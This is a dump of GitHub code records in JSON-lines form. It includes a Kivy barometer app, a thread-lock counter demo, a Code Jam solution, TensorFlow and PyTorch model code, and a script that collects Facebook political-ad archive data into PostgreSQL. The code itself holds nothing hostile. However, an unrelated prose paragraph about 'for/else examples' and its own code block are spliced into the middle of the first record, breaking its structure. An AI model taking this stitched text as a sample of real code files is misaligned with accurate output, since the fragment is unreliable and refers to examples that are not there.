ObjectProperty()\n pressure = NumericProperty()\n\n def enable(self):\n self.barometer.enable()\n Clock.schedule_interval(self.get_pressure, 1 / 20.)\n\n def disable(self):\n self.barometer.disable()\n Clock.unschedule(self.get_pressure)\n\n def get_pressure(self, dt):\n self.pressure = self.barometer.pressure or self.pressure\n\n\nclass BarometerApp(App):\n\n def build(self):\n return BarometerInterface()\n\n def on_pause(self):\n return True\n\n\nif __name__ == \"__main__\":\n 
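The `for`/`else` examples above hinge on one rule: the `else` suite runs only when the loop finishes without hitting `break`. A compact sketch of that control flow:

```python
def first_even(values):
    """for/else: the else suite runs only if the loop completed without break."""
    for v in values:
        if v % 2 == 0:
            found = v
            break
    else:
        found = None
    return found

assert first_even([1, 9, 8]) == 8
assert first_even([1, 3, 5]) is None
```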
BarometerApp().run()\n","repo_name":"kivy/plyer","sub_path":"examples/barometer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1761,"program_lang":"python","lang":"en","doc_type":"code","stars":1476,"dataset":"github-code","pt":"61"} +{"seq_id":"39775420281","text":"from multiprocessing.dummy import Pool as ThreadPool, Lock\n\nnum = 0 # def global num\nlock = Lock()\n\n\ndef test(i):\n print(f\"子进程:{i}\")\n global num\n global lock\n for i in range(100000):\n with lock:\n num += 1\n\n\ndef main():\n p = ThreadPool()\n p.map_async(test, list(range(5)))\n p.close()\n p.join()\n\n print(num)\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"lotapp/BaseCode","sub_path":"python/5.concurrent/Thread/2.lock_queue/1.thread/1.thread.2.py","file_name":"1.thread.2.py","file_ext":"py","file_size_in_byte":400,"program_lang":"python","lang":"en","doc_type":"code","stars":25,"dataset":"github-code","pt":"61"} +{"seq_id":"23403846311","text":"import math\r\n\r\nin_data = open('A-large.in').readlines()\r\nin_data = [x.strip() for x in in_data]\r\nT = int(in_data[0])\r\nin_data = in_data[1:]\r\n\r\ndef step(begin, m):\r\n if begin==1:\r\n return len(m)\r\n count = 0\r\n max_count = len(m)\r\n for i in range(len(m)):\r\n if begin > m[i]:\r\n begin += m[i]\r\n print(begin)\r\n else:\r\n max_count = min(max_count, count + (len(m)-i))\r\n tmp_count = int(math.log2((m[i]-1)/(begin-1)) + 1) + 1\r\n count += (tmp_count-1)\r\n print(tmp_count)\r\n begin = 2 ** (tmp_count - 1) * (begin - 1) + 1 + m[i]\r\n print(begin)\r\n if count > max_count:\r\n return max_count\r\n return count\r\n\r\n\r\nwfile = open('result', 'w')\r\nfor case_no in range(T):\r\n dt = in_data[:2]\r\n in_data = in_data[2:]\r\n begin = int(dt[0].split()[0])\r\n m = [int(x) for x in dt[1].strip().split()]\r\n m.sort()\r\n res = step(begin, m)\r\n output = 'Case #' + str(case_no+1) + ': ' + str(res) + '\\n'\r\n wfile.write(output)\r\n \r\nwfile.close()\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_123/251.py","file_name":"251.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"18987441910","text":"# -*- coding: utf-8 -*-\nfrom __future__ import print_function\nfrom __future__ import absolute_import\nimport tensorflow as tf\n\n\n\n\n\ndef batch_norm(x, is_training, epsilon=1e-5, decay=0.9, scope=\"batch_norm\",\n parameter_update_device='-1'):\n with tf.device(parameter_update_device):\n var = tf.contrib.layers.batch_norm(x, decay=decay, updates_collections=None, epsilon=epsilon,\n scale=True, is_training=is_training, scope=scope)\n\n return var\n\n\ndef conv2d(x, output_filters, kh=5, kw=5, sh=2, sw=2, stddev=0.02, scope=\"conv2d\",\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n shape = x.get_shape().as_list()\n\n # W = tf.get_variable('W', [kh, kw, shape[-1], output_filters],\n # initializer=tf.truncated_normal_initializer(stddev=stddev))\n\n W = parameter_variable_creation_with_device_selection('W',shape=[kh, kw, shape[-1], output_filters],\n initializer=tf.truncated_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n\n\n Wconv = tf.nn.conv2d(x, W, strides=[1, sh, sw, 1], padding='SAME')\n\n #biases = tf.get_variable('b', [output_filters], initializer=tf.constant_initializer(0.0))\n biases = parameter_variable_creation_with_device_selection('b',shape=[output_filters],\n initializer=tf.constant_initializer(0.0),\n 
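In the `ThreadPool` counter above, the lock is what keeps `num += 1` correct: the increment compiles to separate load/add/store steps that threads can interleave, losing updates. A self-contained variant that can be run with and without the lock; whether lost updates actually show up without it depends on the interpreter version and load:

```python
from multiprocessing.dummy import Pool as ThreadPool, Lock

def count(n_workers=5, iterations=100_000, use_lock=True):
    """Increment a shared counter from several threads."""
    total = 0
    lock = Lock()

    def worker(_):
        nonlocal total
        for _ in range(iterations):
            if use_lock:
                with lock:  # serialise the read-modify-write
                    total += 1
            else:
                total += 1  # racy: interleaved load/add/store can drop increments

    pool = ThreadPool(n_workers)
    pool.map(worker, range(n_workers))
    pool.close()
    pool.join()
    return total

print(count(use_lock=True))   # always 500000
print(count(use_lock=False))  # may come out lower under contention
```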
parameter_update_device=parameter_update_device)\n\n Wconv_plus_b = tf.reshape(tf.nn.bias_add(Wconv, biases), Wconv.get_shape())\n\n return Wconv_plus_b\n\n\ndef deconv2d(x, output_shape, kh=5, kw=5, sh=2, sw=2, stddev=0.02, scope=\"deconv2d\",\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n # filter : [height, width, output_channels, in_channels]\n input_shape = x.get_shape().as_list()\n # W = tf.get_variable('W', [kh, kw, output_shape[-1], input_shape[-1]],\n # initializer=tf.random_normal_initializer(stddev=stddev))\n W = parameter_variable_creation_with_device_selection('W',shape=[kh, kw, output_shape[-1], input_shape[-1]],\n initializer=tf.random_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n\n deconv = tf.nn.conv2d_transpose(x, W, output_shape=output_shape,\n strides=[1, sh, sw, 1])\n\n # biases = tf.get_variable('b', [output_shape[-1]], initializer=tf.constant_initializer(0.0))\n biases = parameter_variable_creation_with_device_selection('b',shape=[output_shape[-1]],\n initializer=tf.constant_initializer(0.0),\n parameter_update_device=parameter_update_device)\n deconv_plus_b = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n\n return deconv_plus_b\n\n\ndef lrelu(x, leak=0.2):\n return tf.maximum(x, leak * x)\n\n\ndef fc(x, output_size, stddev=0.02, scope=\"fc\",\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n shape = x.get_shape().as_list()\n # W = tf.get_variable(\"W\", [shape[1], output_size], tf.float32,\n # tf.random_normal_initializer(stddev=stddev))\n # b = tf.get_variable(\"b\", [output_size],\n # initializer=tf.constant_initializer(0.0))\n\n W = parameter_variable_creation_with_device_selection(\"W\", shape=[shape[1], output_size],\n initializer=tf.random_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n b = parameter_variable_creation_with_device_selection(\"b\", shape=[output_size],\n initializer=tf.constant_initializer(0.0),\n parameter_update_device=parameter_update_device)\n return tf.matmul(x, W) + b\n\n\ndef init_embedding_dictionary(size, dimension, stddev=0.01, scope=\"generator\",\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n # return tf.get_variable(\"gen_ebdd_dictionary\", [size, dimension], tf.float32,\n # tf.random_normal_initializer(stddev=stddev))\n\n return parameter_variable_creation_with_device_selection(\"gen_ebdd_dictionary\",shape=[size, dimension],\n initializer=tf.random_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n\n\ndef init_embedding_weights(size, stddev=1, scope=\"generator\", name='tmp',\n parameter_update_device='-1'):\n with tf.variable_scope(scope):\n # init_weight = tf.get_variable(name, size, tf.float32,\n # tf.random_normal_initializer(stddev=stddev))\n init_weight = parameter_variable_creation_with_device_selection(name,shape=size,\n initializer=tf.random_normal_initializer(stddev=stddev),\n parameter_update_device=parameter_update_device)\n\n # if weight_norm_mark==True:\n # init_weight=weight_norm(input=init_weight)\n return init_weight\n\n\ndef weight_norm(input):\n # output=input\n sum_value = tf.reduce_sum(input, axis=1)\n sum_value = tf.expand_dims(sum_value, axis=1)\n # sum_value=tf.transpose(sum_value)\n one_multipliers = tf.ones([1, int(input.shape[1])], dtype=tf.float32)\n sum_value = tf.matmul(sum_value, one_multipliers)\n output = tf.truediv(input, tf.abs(sum_value))\n return output\n\n\ndef conditional_instance_norm(x, ids, 
labels_num, mixed=False, scope=\"conditional_instance_norm\"):\n with tf.variable_scope(scope):\n shape = x.get_shape().as_list()\n batch_size, output_filters = shape[0], shape[-1]\n scale = tf.get_variable(\"scale\", [labels_num, output_filters], tf.float32, tf.constant_initializer(1.0))\n shift = tf.get_variable(\"shift\", [labels_num, output_filters], tf.float32, tf.constant_initializer(0.0))\n\n mu, sigma = tf.nn.moments(x, [1, 2], keep_dims=True)\n norm = (x - mu) / tf.sqrt(sigma + 1e-5)\n\n batch_scale = tf.reshape(tf.nn.embedding_lookup([scale], ids=ids), [batch_size, 1, 1, output_filters])\n batch_shift = tf.reshape(tf.nn.embedding_lookup([shift], ids=ids), [batch_size, 1, 1, output_filters])\n\n z = norm * batch_scale + batch_shift\n return z\n\n\ndef parameter_variable_creation_with_device_selection(name, shape, initializer,\n parameter_update_device='-1'):\n \"\"\"Helper to create a Variable stored on CPU memory.\n Args:\n name: name of the variable\n shape: list of ints\n initializer: initializer for Variable\n Returns:\n Variable Tensor\n \"\"\"\n with tf.device(parameter_update_device):\n dtype = tf.float32\n var = tf.get_variable(name, shape, initializer=initializer, dtype=dtype)\n return var","repo_name":"jiaomiaomiao/zi2zi-master-modified","sub_path":"model/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":7703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"12231759772","text":"import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torch.nn.functional as F\nimport copy\n\nclass Buffed_LSTM(nn.Module):\n def __init__(self, input_size, hidden_size, num_layers, batch_first):\n super().__init__()\n self.lstm = nn.LSTM(input_size=input_size, hidden_size=hidden_size, num_layers=num_layers, batch_first=batch_first)\n\n def forward(self, input, hidden_state=None, cell_state=None):\n if hidden_state is None or cell_state is None:\n output, (hidden, cell) = self.lstm(input)\n else:\n output, (hidden, cell) = self.lstm(input, (hidden_state, cell_state))\n return output, (hidden, cell)\n\nclass DQN_LSTM(nn.Module):\n \"\"\"mini CNN structure\n input -> (conv2d + relu) x 3 -> flatten -> (dense + relu) x 2 -> output\n \"\"\"\n\n def __init__(self, input_dim, output_dim):\n super().__init__()\n c, h, w = input_dim\n\n self.online = nn.Sequential(\n nn.Conv2d(in_channels=c, out_channels=c*2, kernel_size=3, stride=1,padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=c*2, out_channels=c*4, kernel_size=3, stride=1,padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=c*4, out_channels=c*8, kernel_size=3, stride=1,padding=1),\n nn.ReLU(),\n nn.Conv2d(in_channels=c*8, out_channels=c*8, kernel_size=3, stride=1,padding=1),\n nn.ReLU(),\n nn.Flatten(),\n nn.LazyLinear(256),\n nn.ReLU(),\n # nn.LazyLinear(64),\n Buffed_LSTM(256,256,1,True),\n nn.ReLU(),\n nn.LazyLinear(output_dim)\n )\n\n self.target = copy.deepcopy(self.online)\n\n # Q_target parameters are frozen.\n for p in self.target.parameters():\n p.requires_grad = False\n\n def forward(self, input, model, hidden_state=None, cell_state=None):\n if model == \"online\":\n # print(input.shape)\n features = self.online[:-3](input)\n features = features.unsqueeze(1)\n # print(features.shape)\n # if hidden_state is not None:\n # print(\"hidden before:\", hidden_state.shape)\n output, (hidden, cell) = self.online[-3](features, hidden_state, cell_state)\n # print(\"hidden:\", hidden.shape) \n output = F.relu(output)\n output = self.online[-1](output)\n output 
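`conditional_instance_norm` above normalizes each sample over its spatial axes, then applies a per-label scale and shift selected by `ids` via embedding lookup. A NumPy sketch of the same arithmetic, assuming the NHWC layout the TF code uses:

```python
import numpy as np

def conditional_instance_norm_np(x, ids, scale, shift, eps=1e-5):
    """x: (N, H, W, C); ids: (N,) label indices; scale/shift: (num_labels, C).
    Normalise each sample over its spatial axes, then apply the label's scale/shift."""
    mu = x.mean(axis=(1, 2), keepdims=True)
    var = x.var(axis=(1, 2), keepdims=True)
    norm = (x - mu) / np.sqrt(var + eps)
    return norm * scale[ids][:, None, None, :] + shift[ids][:, None, None, :]

x = np.random.randn(2, 4, 4, 3)
scale, shift = np.ones((5, 3)), np.zeros((5, 3))
print(conditional_instance_norm_np(x, np.array([0, 3]), scale, shift).shape)  # (2, 4, 4, 3)
```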
= output.squeeze(1)\n return output, (hidden, cell)\n elif model == \"target\":\n features = self.target[:-3](input)\n features = features.unsqueeze(1)\n output, (hidden, cell) = self.target[-3](features, hidden_state, cell_state)\n output = F.relu(output)\n output = self.target[-1](output)\n output = output.squeeze(1)\n return output, (hidden, cell)\n \n","repo_name":"Carton9/The-Learning-Shoal","sub_path":"src/dqn_LSTM.py","file_name":"dqn_LSTM.py","file_ext":"py","file_size_in_byte":2859,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70974451715","text":"from urllib.parse import urlparse, parse_qs\nimport json\nimport random\nimport configparser\nfrom collections import namedtuple\nfrom time import sleep\nimport datetime\nimport time\nimport os\nimport sys\nimport psycopg2\nimport psycopg2.extras\nimport facebook\nfrom OpenSSL import SSL\n\nif len(sys.argv) < 2:\n exit(\"Usage:python3 page_id_fb_collector.py page_id_fb_collector.cfg\")\n\nconfig = configparser.ConfigParser()\nconfig.read(sys.argv[1])\n\ncrawl_date = datetime.date.today() \ncountry_code = config['SEARCH']['COUNTRY_CODE']\n\ndef existing_ads(cursor):\n existing_ad_query = \"select archive_id, is_active from ads\"\n cursor.execute(existing_ad_query)\n ad_ids = set()\n active_ads = set()\n for row in cursor:\n ad_ids.add(row['archive_id'])\n if row['is_active'] == True:\n active_ads.add(row['archive_id'])\n \n return (ad_ids, active_ads)\n\ndef existing_demos(cursor):\n existing_demo_group_query = \"select gender, age, id from demo_groups;\"\n cursor.execute(existing_demo_group_query)\n existing_demo_groups = {}\n for row in cursor:\n existing_demo_groups[row['age']+row['gender']] = row['id']\n\n return existing_demo_groups\n\ndef existing_region(cursor):\n existing_regions_query = \"select name, id from regions;\"\n cursor.execute(existing_regions_query)\n existing_regions = {}\n for row in cursor:\n existing_regions[row['name']] = row['id']\n\n return existing_regions\n\ndef existing_page(cursor):\n existing_pages_query = \"select page_id, page_name from pages;\"\n cursor.execute(existing_pages_query)\n existing_pages = set()\n for row in cursor:\n existing_pages.add(row['page_id'])\n\n return existing_pages\n\ndef existing_sponsors(cursor):\n existing_ad_sponsor_query = \"select id, name from ad_sponsors;\"\n cursor.execute(existing_ad_sponsor_query)\n existing_ad_sponsors = {}\n for row in cursor:\n existing_ad_sponsors[row['name']] = row['id']\n\n return existing_ad_sponsors\n\ndef insert_ad_sponsors(cursor, new_ad_sponsors):\n insert_ad_sponsor = \"INSERT INTO ad_sponsors(name) VALUES \"\n ad_sponsor_count = 0\n for ad_sponsor in new_ad_sponsors:\n insert_ad_sponsor += cursor.mogrify(\"(%s),\", (ad_sponsor,)).decode('utf-8')\n ad_sponsor_count += 1\n\n if ad_sponsor_count >= 250:\n insert_ad_sponsor = insert_ad_sponsor[:-1]\n insert_ad_sponsor += \";\"\n #print(cursor.mogrify(insert_ad_sponsor))\n cursor.execute(insert_ad_sponsor)\n insert_ad_sponsor = \"INSERT INTO ad_sponsors(name) VALUES \"\n ad_sponsor_count = 0\n\n if ad_sponsor_count > 0:\n insert_ad_sponsor = insert_ad_sponsor[:-1]\n insert_ad_sponsor += \";\"\n #print(cursor.mogrify(insert_ad_sponsor))\n cursor.execute(insert_ad_sponsor)\n\n\ndef insert_pages(cursor, new_pages):\n insert_page = \"INSERT INTO pages(page_id, page_name) VALUES \"\n page_count = 0\n for page in new_pages:\n insert_page += cursor.mogrify(\"(%s, %s),\",(page.id, page.name)).decode('utf-8')\n page_count += 1\n \n if 
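`DQN_LSTM` above freezes a `deepcopy` of the online network as the target (`requires_grad = False`). The usual companion step in such training loops — periodically hard-syncing the target from the online weights — is not shown in this file; a sketch on a toy module, with the sync interval left to the caller:

```python
import copy
import torch.nn as nn

online = nn.Linear(4, 2)
target = copy.deepcopy(online)
for p in target.parameters():
    p.requires_grad = False  # frozen: gradients only flow through the online net

# periodic hard sync, typically every N learn steps
target.load_state_dict(online.state_dict())
```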
page_count >= 250:\n insert_page = insert_page[:-1]\n insert_page += \";\"\n #print(cursor.mogrify(insert_page))\n cursor.execute(insert_page)\n insert_page = \"INSERT INTO pages(page_id, page_name) VALUES \"\n page_count = 0\n\n insert_page = insert_page[:-1]\n insert_page += \";\"\n if page_count > 0:\n #print(cursor.mogrify(insert_page))\n cursor.execute(insert_page)\n\ndef insert_regions(cursor, new_regions):\n insert_region = \"INSERT into regions(name) VALUES \"\n region_count = 0\n for region in new_regions:\n insert_region += cursor.mogrify(\"(%s),\",(region,)).decode('utf-8')\n region_count += 1\n \n if region_count >= 250:\n insert_region = insert_region[:-1]\n insert_region += \";\"\n cursor.execute(insert_region)\n insert_region = \"INSERT INTO regions(name) VALUES \"\n region_count = 0\n\n if region_count > 0:\n insert_region = insert_region[:-1]\n insert_region += \";\"\n #print(cursor.mogrify(insert_regions))\n cursor.execute(insert_region)\n\ndef insert_demos(cursor, new_demo_groups):\n insert_demo_groups = \"INSERT INTO demo_groups(age, gender) VALUES \"\n demo_group_count = 0\n for key, val in new_demo_groups.items():\n insert_demo_groups += cursor.mogrify(\"(%s, %s),\",(val[0], val[1])).decode('utf-8')\n demo_group_count += 1\n \n if demo_group_count >= 250:\n insert_demo_groups = insert_demo_groups[:-1]\n insert_demo_groups += \";\"\n #print(cursor.mogrify(insert_demo_groups))\n cursor.execute(insert_demo_groups)\n insert_demo_groups = \"INSERT INTO demo_groups(age, gender) VALUES \"\n demo_group_count = 0\n\n if demo_group_count > 0:\n insert_demo_groups = insert_demo_groups[:-1]\n insert_demo_groups += \";\"\n #print(cursor.mogrify(insert_demo_groups))\n cursor.execute(insert_demo_groups)\n\ndef main(search_term, connection):\n #structures to hold all the new stuff we find\n new_ads = set()\n new_ad_sponsors = set()\n new_pages = set()\n new_demo_groups = {}\n new_regions = set()\n new_impressions = set()\n new_ad_region_impressions = set()\n new_ad_demo_impressions = set()\n\n #cache of ads/pages/regions/demo_groups we've already seen so we don't reinsert them\n (ad_ids, active_ads) = existing_ads(cursor)\n existing_regions = existing_region(cursor)\n existing_demo_groups = existing_demos(cursor)\n existing_pages = existing_page(cursor)\n existing_ad_sponsors = existing_sponsors(cursor)\n\n #get ads\n graph = facebook.GraphAPI(access_token=FB_ACCESS_TOKEN)\n has_next = True\n already_seen = False\n next_cursor = \"\"\n print(datetime.datetime.now())\n print(search_term)\n request_count = 0\n while has_next and not already_seen and request_count < 40:\n request_count += 1\n try:\n results = None\n print(\"making page_id request for \" + str(search_term))\n if not next_cursor:\n sleep(SLEEP_TIME)\n print(\"making request\")\n results = graph.get_object(id='ads_archive', \n ad_reached_countries=country_code, \n ad_type='POLITICAL_AND_ISSUE_ADS',\n ad_active_status='ALL',\n limit=2000,\n search_page_ids=search_term,\n fields=\",\".join(field_list))\n else:\n sleep(SLEEP_TIME * 2)\n print(\"making request\")\n results = graph.get_object(id='ads_archive', \n ad_reached_countries=country_code, \n ad_type='POLITICAL_AND_ISSUE_ADS',\n ad_active_status='ALL',\n limit=2000,\n search_page_ids=search_term,\n fields=\",\".join(field_list),\n after=next_cursor)\n\n except facebook.GraphAPIError as e:\n print(\"Graph Error\")\n print(e.code)\n print(e)\n if results:\n print(results)\n else:\n print(\"No results\")\n if e.code == 4: # this means we've gotten to the FB max results per 
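The mogrify-and-concatenate batching in `insert_pages` and its siblings above can also be expressed with `psycopg2.extras.execute_values`, which builds the multi-row `VALUES` list and handles escaping and batching itself. A sketch of the pages insert written that way — an alternative, not the repo's code, and it still needs a live connection to run:

```python
import psycopg2.extras

def insert_pages_batched(cursor, new_pages, page_size=250):
    """Alternative to the hand-built mogrify loops: one call batches all rows."""
    psycopg2.extras.execute_values(
        cursor,
        "INSERT INTO pages(page_id, page_name) VALUES %s",
        [(p.id, p.name) for p in new_pages],
        page_size=page_size,  # rows per generated statement, like the manual 250 cap
    )
```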
query\n                sleep(240)\n                has_next = False\n                continue\n            else:\n                print(\"resetting graph\")\n                graph = facebook.GraphAPI(access_token=FB_ACCESS_TOKEN)\n                continue\n        except OSError as e:\n            print(\"OS error: {0}\".format(e))\n            print(datetime.datetime.now())\n            sleep(60)\n            print(\"resetting graph\")\n            graph = facebook.GraphAPI(access_token=FB_ACCESS_TOKEN)\n            continue\n\n        except SSL.SysCallError as e:\n            print(\"resetting graph\")\n            graph = facebook.GraphAPI(access_token=FB_ACCESS_TOKEN)\n            continue\n\n\n        old_ad_count = 0 \n        total_ad_count = 0\n        for result in results['data']:\n            total_ad_count += 1\n            image_url = result['ad_snapshot_url']\n            url_parts = urlparse(image_url)\n            archive_id = int(parse_qs(url_parts.query)['id'][0])\n            page_id = result['page_id']\n            page_name = result['page_name']\n            start_date = result['ad_delivery_start_time']\n            currency = result['currency']\n            ad_text = ''\n            if 'ad_creative_body' in result:\n                ad_text = result['ad_creative_body']\n            ad_sponsor_label = ''\n            if 'funding_entity' in result:\n                ad_sponsor_label = result['funding_entity']\n\n            if ad_sponsor_label not in existing_ad_sponsors:\n                new_ad_sponsors.add(ad_sponsor_label)\n\n            is_active = True\n            end_date = None\n            if 'ad_delivery_stop_time' in result:\n                end_date = result['ad_delivery_stop_time']\n                is_active = False\n\n            min_impressions = 0\n            max_impressions = 0\n            min_spend = 0\n            max_spend = 0\n            if 'impressions' in result:\n                min_impressions = result['impressions']['lower_bound']\n                max_impressions = result['impressions']['upper_bound']\n            if 'spend' in result:\n                min_spend = result['spend']['lower_bound']\n                max_spend = result['spend']['upper_bound']\n\n            link_caption = ''\n            if 'ad_creative_link_caption' in result:\n                link_caption = result['ad_creative_link_caption']\n            link_description = ''\n            if 'ad_creative_link_description' in result:\n                link_description = result['ad_creative_link_description']\n            link_title = ''\n            if 'ad_creative_link_title' in result:\n                link_title = result['ad_creative_link_title']\n\n            if int(page_id) not in existing_pages:\n                new_pages.add(PageRecord(page_id, page_name))\n\n\n            parsed_end_date = None\n            if end_date:\n                parsed_end_date = datetime.datetime.strptime(end_date[:10], '%Y-%m-%d')\n            parsed_start_date = None\n            if start_date:\n                parsed_start_date = datetime.datetime.strptime(start_date[:10], '%Y-%m-%d')\n\n            if not is_active and archive_id in ad_ids:\n                old_ad_count += 1\n\n            curr_ad = AdRecord(archive_id, \n                               page_id, \n                               image_url, \n                               ad_text,\n                               ad_sponsor_label,\n                               start_date, \n                               start_date, \n                               end_date, \n                               is_active, \n                               min_impressions, \n                               max_impressions, \n                               min_spend, \n                               max_spend,\n                               currency,\n                               link_caption,\n                               link_description,\n                               link_title)\n\n\n            if is_active or archive_id in active_ads or archive_id not in ad_ids:\n                new_impressions.add(curr_ad)\n                if 'demographic_distribution' not in result:\n                    print(\"no demo information in:\")\n                    print(result)\n                    continue\n                \n                if 'region_distribution' not in result:\n                    print(\"no region information in:\")\n                    print(result)\n                    continue\n                \n                for demo_result in result['demographic_distribution']:\n                    demo_key = demo_result['gender']+demo_result['age']\n                    if demo_key not in existing_demo_groups:\n                        new_demo_groups[demo_key] = (demo_result['gender'], demo_result['age'])\n\n                    new_ad_demo_impressions.add(SnapshotDemoRecord(archive_id,\n                                                                   demo_result['age'], \n                                                                   demo_result['gender'], \n                                                                   float(demo_result['percentage']) * int(min_impressions), \n                                                                   float(demo_result['percentage']) * int(max_impressions), \n                                                                   float(demo_result['percentage']) * int(min_spend), \n                                                                   float(demo_result['percentage']) * int(max_spend), \n                                                                   
crawl_date))\n \n for region_result in result['region_distribution']:\n if region_result['region'] not in existing_regions:\n new_regions.add(region_result['region'])\n new_ad_region_impressions.add(SnapshotRegionRecord(archive_id,\n region_result['region'], \n float(region_result['percentage']) * int(min_impressions), \n float(region_result['percentage']) * int(max_impressions), \n float(region_result['percentage']) * int(min_spend), \n float(region_result['percentage']) * int(max_spend), \n crawl_date))\n\n if archive_id not in ad_ids:\n new_ads.add(curr_ad)\n ad_ids.add(archive_id)\n\n\n #we finished parsing each result\n print(old_ad_count)\n print(\"total ads=\" + str(total_ad_count))\n if total_ad_count > 0 and float(old_ad_count) / float(total_ad_count) > .75:\n already_seen = True\n\n if \"paging\" in results and \"next\" in results[\"paging\"]:\n next_cursor = results[\"paging\"][\"cursors\"][\"after\"]\n else:\n has_next = False\n\n #write new pages, regions, and demo groups to db first so we can update our caches before writing ads\n insert_ad_sponsors(cursor, new_ad_sponsors)\n insert_pages(cursor, new_pages)\n insert_regions(cursor, new_regions)\n insert_demos(cursor, new_demo_groups)\n\n connection.commit()\n existing_regions = existing_region(cursor)\n existing_demo_groups = existing_demos(cursor)\n existing_pages = existing_page(cursor)\n existing_ad_sponsors = existing_sponsors(cursor)\n\n #write new ads to our database\n print(\"writing \" + str(len(new_ads)) + \" to db\")\n ad_insert_query = \"INSERT INTO ads(archive_id, creation_date, start_date, end_date, currency, page_id, snapshot_url, text, ad_sponsor_id, is_active, link_caption, link_description, link_title, country_code) VALUES \"\n ad_count = 0\n for ad in new_ads:\n ad_insert_query += cursor.mogrify(\"(%s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s, %s),\", (ad.archive_id, ad.creation_date, ad.start_date, ad.end_date, currency, ad.page_id, ad.image_url, ad.text, existing_ad_sponsors[ad.sponsor_label], ad.is_active, ad.ad_creative_link_caption, ad.ad_creative_link_description, ad.ad_creative_link_title, country_code)).decode('utf-8')\n ad_count += 1\n\n if ad_count >= 250:\n ad_insert_query = ad_insert_query[:-1]\n ad_insert_query += \";\"\n #print(cursor.mogrify(ad_insert_query))\n cursor.execute(ad_insert_query)\n ad_insert_query = \"INSERT INTO ads(archive_id, creation_date, start_date, end_date, currency, page_id, snapshot_url, text, ad_sponsor_id, is_active, link_caption, link_description, link_title, country_code) VALUES \"\n ad_count = 0\n\n if ad_count > 0:\n ad_insert_query = ad_insert_query[:-1]\n ad_insert_query += \";\"\n #print(cursor.mogrify(ad_insert_query))\n cursor.execute(ad_insert_query)\n\n\n impressions_insert_query = \"INSERT INTO impressions(ad_archive_id, crawl_date, min_impressions, min_spend, max_impressions, max_spend) VALUES \"\n impression_count = 0\n print(\"writing \" + str(len(new_impressions)) + \" impressions to db\")\n for impression in new_impressions:\n impressions_insert_query += cursor.mogrify(\"(%s, %s, %s, %s, %s, %s),\", (impression.archive_id, crawl_date, impression.min_impressions, impression.min_spend, impression.max_impressions, impression.max_spend)).decode('utf-8')\n impression_count += 1\n\n if impression_count >= 250:\n impressions_insert_query = impressions_insert_query[:-1]\n impressions_insert_query += \";\"\n #print(cursor.mogrify(impressions_insert_query))\n cursor.execute(impressions_insert_query)\n impressions_insert_query = \"INSERT INTO 
impressions(ad_archive_id, crawl_date, min_impressions, min_spend, max_impressions, max_spend) VALUES \"\n impression_count = 0\n\n if impression_count > 0:\n impressions_insert_query = impressions_insert_query[:-1]\n impressions_insert_query += \";\"\n #print(cursor.mogrify(impressions_insert_query))\n cursor.execute(impressions_insert_query)\n\n impression_demo_insert_query = \"INSERT INTO demo_impressions(ad_archive_id, demo_id, min_impressions, min_spend, max_impressions, max_spend, crawl_date) VALUES \"\n impression_count = 0\n for impression in new_ad_demo_impressions:\n impression_demo_insert_query += cursor.mogrify(\"(%s, %s, %s, %s, %s, %s, current_date),\", (impression.archive_id, existing_demo_groups[impression.gender + impression.age_range], impression.min_impressions, impression.min_spend, impression.max_impressions, impression.max_spend)).decode('utf-8')\n impression_count += 1\n\n if impression_count >= 250:\n impression_demo_insert_query = impression_demo_insert_query[:-1]\n impression_demo_insert_query += \";\"\n #print(cursor.mogrify(impression_demo_insert_query))\n cursor.execute(impression_demo_insert_query)\n impression_demo_insert_query = \"INSERT INTO demo_impressions(ad_archive_id, demo_id, min_impressions, min_spend, max_impressions, max_spend, crawl_date) VALUES \"\n impression_count = 0\n\n if impression_count > 0:\n impression_demo_insert_query = impression_demo_insert_query[:-1]\n impression_demo_insert_query += \";\"\n #print(cursor.mogrify(impression_demo_insert_query))\n cursor.execute(impression_demo_insert_query)\n\n impression_region_insert_query = \"INSERT INTO region_impressions(ad_archive_id, region_id, min_impressions, min_spend, max_impressions, max_spend, crawl_date) VALUES \"\n impression_count = 0\n for impression in new_ad_region_impressions:\n impression_region_insert_query += cursor.mogrify(\"(%s, %s, %s, %s, %s, %s, current_date),\", (impression.archive_id, existing_regions[impression.name], impression.min_impressions, impression.min_spend, impression.max_impressions, impression.max_spend)).decode('utf-8')\n impression_count += 1\n\n if impression_count >= 250:\n impression_region_insert_query = impression_region_insert_query[:-1]\n impression_region_insert_query += \";\"\n #print(cursor.mogrify(impression_region_insert_query))\n cursor.execute(impression_region_insert_query)\n impression_region_insert_query = \"INSERT INTO region_impressions(ad_archive_id, region_id, min_impressions, min_spend, max_impressions, max_spend, crawl_date) VALUES \"\n impression_count = 0\n\n if impression_count > 0:\n impression_region_insert_query = impression_region_insert_query[:-1]\n impression_region_insert_query += \";\"\n #print(cursor.mogrify(impression_region_insert_query))\n cursor.execute(impression_region_insert_query)\n\n connection.commit()\n\n\n#get page data\npage_ids = []\ninput_FILES = config['INPUT']['FILES']\nprint(input_FILES)\nfile_list = json.loads(input_FILES)\nfor file_name in file_list:\n with open(file_name) as input:\n for row in input:\n page_ids.append(int(row.strip()))\n\n\n#setup our db cursor\nHOST = config['POSTGRES']['HOST']\nDBNAME = 